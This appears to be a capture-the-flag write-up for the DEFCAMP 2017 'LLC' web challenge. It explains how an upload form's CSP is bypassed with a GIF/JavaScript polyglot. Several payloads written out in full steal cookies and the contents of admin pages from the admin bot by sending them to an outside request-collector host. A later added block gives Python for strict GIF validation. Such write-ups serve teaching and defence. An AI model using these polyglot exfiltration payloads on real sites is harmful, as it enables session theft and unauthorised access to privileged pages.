DEFCAMP CTF Quals 2017 -- LLC -- WebChall Writeup


Problem description

We are looking for your feedback about our new amazing company! :-)


Looking at the website, we notice that after submitting the form our inputs are sent back exactly as we entered them.

So maybe an XSS? Let's try.

The problem here is that we've got a CSP:

content-security-policy: default-src 'none'; img-src 'self' *.imgur.com *.ibb.co; script-src 'self'; connect-src 'self'; style-src 'self' fonts.googleapis.com fonts.gstatic.com 'unsafe-inline'; font-src 'self' fonts.gstatic.com  fonts.googleapis.com;


The good part is that script-src points to 'self', so if we can somehow use the upload function to upload our JS payload, we can execute our exploit successfully.

The form only accepts jpg, jpeg, png and gif, with a 500-byte max file size.

There is also an image format check, not only an extension check.

So an image/XSS polyglot would solve this.

Here is my GIF payload:

GIF89a= 'MUMBOJUMBOBOGUSBACON';document.location="https://requestb.in/um61ebum?v="+document.cookie;

We get our GIF link from the submitted form result.

Then we resend our payload in the name and message fields, with our JS:

<script type="text/javascript" charset="ISO-8859-1" src="__f8f2bb3ab8715ec9dfc6b89173c06a9f/xss.gif"></script>
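As an added illustration (not part of the original writeup), here is a Python check showing why a magic-bytes "image format check" passes the GIF/JS polyglot above while a parser that walks the full GIF block structure rejects it; the sample bytes are constructed, and the polyglot uses a harmless JS body.

```python
import struct

# Constructed sample inputs (not from the challenge): the polyglot shape used in
# the writeup with a harmless JS body, and a minimal 1x1 GIF with a 2-entry palette.
POLYGLOT = b"GIF89a= 'MUMBOJUMBOBOGUSBACON';console.log('polyglot');"
MINIMAL_GIF = (
    b"GIF89a" + b"\x01\x00\x01\x00\x80\x00\x00"      # header + logical screen descriptor
    + b"\x00\x00\x00\xff\xff\xff"                    # global colour table (2 entries)
    + b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00"    # image descriptor
    + b"\x02" + b"\x02\x44\x01\x00"                  # LZW min code size + data sub-blocks
    + b"\x3b"                                        # trailer
)


def naive_magic_check(data: bytes) -> bool:
    """The kind of 'image format check' a polyglot slips past: magic bytes only."""
    return data[:6] in (b"GIF87a", b"GIF89a")


def _skip_sub_blocks(data: bytes, pos: int):
    """Advance over a chain of length-prefixed sub-blocks; None if it overruns."""
    while pos < len(data):
        n = data[pos]
        pos += 1
        if n == 0:
            return pos
        pos += n
    return None


def strict_gif_check(data: bytes) -> bool:
    """Walk the whole GIF block structure; accept only a fully well-formed file."""
    if len(data) < 13 or not naive_magic_check(data):
        return False
    width, height, packed, _bg, _aspect = struct.unpack("<HHBBB", data[6:13])
    if width == 0 or height == 0:
        return False
    pos = 13 + (3 * (2 << (packed & 0x07)) if packed & 0x80 else 0)
    while pos is not None and pos < len(data):
        intro, pos = data[pos], pos + 1
        if intro == 0x3B:                  # trailer: nothing may follow it
            return pos == len(data)
        if intro == 0x21:                  # extension: label byte, then sub-blocks
            pos = _skip_sub_blocks(data, pos + 1)
        elif intro == 0x2C and pos + 9 <= len(data):   # image descriptor
            lpacked = data[pos + 8]
            pos += 9 + (3 * (2 << (lpacked & 0x07)) if lpacked & 0x80 else 0)
            pos = _skip_sub_blocks(data, pos + 1)       # +1 skips LZW min code size
        else:
            return False
    return False
```

In the polyglot the bytes after `GIF89a` become a bogus screen descriptor and the next byte (`O`) is not a valid block introducer, so the strict walk fails at the first block; re-encoding uploads and serving them from an origin not covered by script-src 'self' is the more robust fix.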


And the bot connects back:

QUERYSTRING

v: USERID=<SCRIPT>alert('XSS')</SCRIPT>



HEADERS

Accept-Encoding: gzip
Connect-Time: 1
Via: 1.1 vegur
Cf-Ray: 3a7bb8703f8e0f81-FRA
Cf-Connecting-Ip: 45.76.95.55
Cf-Visitor: {"scheme":"https"}
X-Request-Id: ec71d7c7-de29-4dd4-aca9-5186fa95060e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: requestb.in
Connection: close
Cookie: __cfduid=d8c8eca22ffed482d0d816ebe7ae673731506696251
Accept-Language: en-US,*
Cf-Ipcountry: DE
Total-Route-Time: 0
Referer: https://llc.dctf-quals-17.def.camp//bot.php?id=8173
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1

Nothing significant in the cookies.

We notice there is a nice page, bot.php (it shows up in the Referer header above).

Requesting the page ourselves gives nothing important.

So let's make the admin request it for us with his privileges.

New payload:

GIF89a= 'MUMBOJUMBOBOGUSBACON';var xh = new XMLHttpRequest();xh.open("GET", "bot.php?id=", false);xh.send();document.location="https://requestb.in/um61ebum?foo="+btoa(xh.responseText);


Also, still no flag yet.

After a while of searching, I suddenly came across an admin.php page.

And we make the admin get us the page:

GIF89a= 'MUMBOJUMBOBOGUSBACON';var xh = new XMLHttpRequest();xh.open("GET", "admin.php", false);xh.send();document.location="https://requestb.in/um61ebum?foo="+btoa(xh.responseText);

And we got a flag in the response:

DCTF{808f50ca3f3182a30e76bb9fcc0fdcb7f75f4ce597f7abe1793e3942acf3ec9e}


Note: I don't get how JS in a .gif file works with the nosniff flag in the headers.

I think it's served from Cloudflare and the admin is browsing the website without Cloudflare? Or is it from the bot JS library used?


